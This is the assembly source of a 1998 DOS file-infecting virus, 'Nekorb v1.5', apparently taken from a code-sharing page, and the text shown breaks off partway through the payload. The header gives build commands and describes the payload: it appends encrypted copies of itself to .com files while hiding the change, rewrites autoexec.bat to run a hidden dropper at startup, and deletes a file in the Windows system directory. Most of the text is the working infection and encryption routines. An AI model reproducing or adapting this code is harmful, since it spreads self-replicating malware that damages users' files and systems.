📄 nekorb.asm
字号:
; ------------------------------------------------------------------------- ;
; Nekorb v1.5 coded by KilJaeden of the Codebreakers 1998 ;
; ------------------------------------------------------------------------- ;
; Description: `-------------------| Started: 10/06/98 | Finished: 11/06/98 ;
; `-------------------^------------------- ;
; v1.0 - start with a simple *.com appender | Size: 824 ;
; v1.1 - time / date restoration `---------- ;
; v1.2 - add XOR,NEG,NOT,ROR encryption and directory changing ;
; v1.3 - infects files with any attributes (readonly/hidden/sys) ;
; v1.4 - saves / restores file attributes now ;
; v1.5 - the craziest payload I have ever done... how to explain this...! ;
; - 1: infects all the .coms it can, and then jumps to c:\ ;
; - 2: finds the autoexec.bat file, if there is none, one is created ;
; - 3: infects either the old, or the new, autoexec.bat file replacing ;
; - the first line of it, so it executes a .com everytime the ;
; - computer is started up! read only and hides the autoexec.bat ;
; - 4: creates the new .com that the autoexec.bat runs on startup ;
; - 5: that new .com jumps to the \windows\system directory, and ;
; - deletes one file, prints a message, and waits for the infected ;
; - user to press any key (just to make sure they see us) ;
; - the new .com is made read only / hidden as well ;
; ------------------------------------------------------------------------- ;
; ----------------------> For Christine Moore <---------------------------- ;
; ------------------------------------------------------------------------- ;
; to compile ::] tasm nekorb.asm ;
; to link :::::] tlink /t nekorb.obj ;
; ------------------------------------------------------------------------- ;
code segment ; name our segment 'code'
assume cs:code,ds:code ; assign CS and DS to code
org 100h ; this be a .com file
blank: db 0e9h,0,0 ; define the blank jump
start: call delta ; push IP on to stack
delta: pop bp ; pop into BP
sub bp,offset delta ; get the delta offset
encst: jmp not1st ; jump to not1st (overwritten)
lea si,[bp+encd] ; points to encrypted area start
mov di,si ; move the value into DI
call encr ; call the de/encryption routine
jmp encd ; jump to start of encrypted stuff
encr: lodsb ; load a byte
not al ; encryptin 1
ror al,4 ; encryptin 2
neg al ; encryptin 3
xor al,byte ptr [bp+key] ; encryptin 4 -final-
neg al ; unencrypt 3
ror al,4 ; unencrypt 2
not al ; unencrypt 1
stosb ; stores the byte
loop encr ; does all the bytes
ret ; returns from call
key db 0 ; our key
encd: lea si,[bp+buffer] ; three bytes to restore
mov di,100h ; load di with 100h
push di ; save this for the 'retn'
movsw ; move two bytes
movsb ; move one byte
lea dx,[bp+offset dta] ; new DTA address
mov ah,1ah ; move the dta
int 21h ; DTA is moved
first: mov ah,4eh ; find the first file
lea dx,[bp+comfile] ; looking for *.c*
mov cx,7 ; with these attributes
next: int 21h ; find the first .com
jnc infect ; found one? infect it
mov ah,3bh ; change directory
lea dx,[bp+updir] ; load the .. string
int 21h ; now up a directory
jnc first ; jump to first
jmp pload ; hit root? do our payload
infect: lea dx,[bp+offset dta+1eh] ; get the file info
mov ax,4300h ; get file attributes
int 21h ; we have them now
push cx ; save value #1
push dx ; save value #2
push ds ; save value #3
mov ax,4301h ; set file attributes
xor cx,cx ; to none at all
int 21h ; ready for infection
call open ; open the file
mov ax,5700h ; get time / date stamps
int 21h ; get them now
push dx ; save value #4
push cx ; save value #5
mov ah,3fh ; read record function
lea dx,[bp+buffer] ; to the buffer
mov cx,3 ; three bytes
int 21h ; read those bytes
mov ax,word ptr [bp+dta+1ah] ; move the file size into AX
mov cx,word ptr [bp+buffer+1] ; move the buffer + 1 into cx
add cx,finish-start+3 ; add virus size + jump
cmp ax,cx ; compare the two
jz shutup ; if equal close the file
cmp ax,1000 ; compare file size with 1kb
jb shutup ; file is too small, close it up
cmp ax,62000 ; compare file size with 62kb
ja shutup ; file is too big, close it up
sub ax,3 ; get jump to virus body size
mov word ptr [bp+newjump+1],ax ; write this as our jump
mov al,00h ; start of file
call scan ; scan to start of file
mov ah,40h ; write to file
lea dx,[bp+newjump] ; write this
mov cx,3 ; # of bytes to write
int 21h ; write it now
mov al,02h ; end of file
call scan ; scan to end of file
in al,40h ; get a random value
mov byte ptr [bp+key],al ; save it as our key
mov ah,40h ; write to file
lea dx,[bp+start] ; where to start writting
mov cx,encd-start ; # of bytes to write
int 21h ; write the non-encrypted stuff
lea di,[bp+finish] ; load DI with end address
push di ; save value #6
lea si,[bp+encd] ; load SI with start address
mov cx,finish-encd ; # of bytes between the two
push cx ; save value #7
call encr ; call the encryption routine
mov ah,40h ; write to file
pop cx ; saved value #7
pop dx ; saved value #6
int 21h ; write those bytes
shutup: mov ax,5701h ; set time / date
pop cx ; from saved value #5
pop dx ; from saved value #4
int 21h ; time / date restored
mov ax,4301h ; set file attributes
pop ds ; from saved value #3
pop dx ; from saved value #2
pop cx ; from saved value #1
int 21h ; set them now
call close ; close the file
mov ah,4fh ; find next file
jmp next ; jump to next
exit: mov dx,80h ; old address of DTA
mov ah,1ah ; restore to original location
int 21h ; DTA is back to original location
retn ; return control to host
; ---------------------------( The Payload )------------------------------- ;
; ------------------------------------------------------------------------- ;
pload: mov ah,0eh ; change drive
mov dl,2 ; to drive c:\
int 21h ; now in c:\
mov ah,3bh ; change directory
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -